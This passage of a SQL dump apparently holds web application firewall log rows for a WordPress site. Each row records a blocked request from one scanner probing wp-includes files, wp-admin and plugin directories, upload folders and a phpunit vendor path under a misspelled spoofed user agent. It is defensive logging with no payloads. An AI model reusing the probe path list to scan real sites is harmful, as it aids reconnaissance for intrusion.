User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLWVkaXRvci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134482,1700146803.330655,1700146803.319200,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/theme-templates.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3RoZW1lLXRlbXBsYXRlcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134483,1700146801.774115,1700146801.755200,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/theme-previews.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3RoZW1lLXByZXZpZXdzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134484,1700146800.080697,1700146800.068200,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/template-canvas.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3RlbXBsYXRlLWNhbnZhcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134485,1700146798.451526,1700146798.443000,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/style-engine.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3N0eWxlLWVuZ2luZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134486,1700146796.825123,1700146796.816500,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/fonts.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2ZvbnRzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134487,1700146795.257552,1700146795.246300,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wpdb.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwZGIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134488,1700146793.524694,1700146793.516000,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-theme-json.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXRoZW1lLWpzb24ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134489,1700146791.530965,1700146791.522400,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-styles.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXN0eWxlcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134490,1700146789.910853,1700146789.902200,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-scripts.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXNjcmlwdHMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134491,1700146788.380711,1700146788.372100,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-http.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWh0dHAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134492,1700146786.902980,1700146786.894200,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-duotone.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWR1b3RvbmUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134493,1700146785.050062,1700146785.035400,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-template.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXRlbXBsYXRlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134494,1700146783.544672,1700146783.535900,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-editor.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLWVkaXRvci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134495,1700146775.302163,1700146775.293200,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/themes/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134496,1700146773.354461,1700146773.345600,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/elementor/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9lbGVtZW50b3Iv\",\"category\":\"brute-force\",\"ssl\":1}'),(134497,1700146771.727731,1700146771.718300,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134498,1700146768.542843,1700146768.527400,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQv\",\"category\":\"brute-force\",\"ssl\":1}'),(134499,1700146766.865686,1700146766.856100,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/user/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL3VzZXIv\",\"category\":\"brute-force\",\"ssl\":1}'),(134500,1700146765.195342,1700146765.186400,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/network/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL25ldHdvcmsv\",\"category\":\"brute-force\",\"ssl\":1}'),(134501,1700146763.561387,1700146763.530300,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/meta/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL21ldGEv\",\"category\":\"brute-force\",\"ssl\":1}'),(134502,1700146750.455784,1700146750.440200,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134503,1700146748.629157,1700146748.620500,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wordpress/wp-includes/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dvcmRwcmVzcy93cC1pbmNsdWRlcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134504,1700146746.838994,1700146746.823300,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wordpress/wp-content/uploads/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dvcmRwcmVzcy93cC1jb250ZW50L3VwbG9hZHMv\",\"category\":\"brute-force\",\"ssl\":1}'),(134505,1700146744.992021,1700146744.983200,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wordpress/wp-admin/includes','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dvcmRwcmVzcy93cC1hZG1pbi9pbmNsdWRlcw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134506,1700146743.182279,1700146743.173500,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/vendor/phpunit/phpunit/src/Util/PHP/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3ZlbmRvci9waHB1bml0L3BocHVuaXQvc3JjL1V0aWwvUEhQLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134507,1700146741.215550,1700146741.206800,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/uploads/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3VwbG9hZHMv\",\"category\":\"brute-force\",\"ssl\":1}'),(134508,1700146739.511798,1700146739.501700,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/upload/image/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 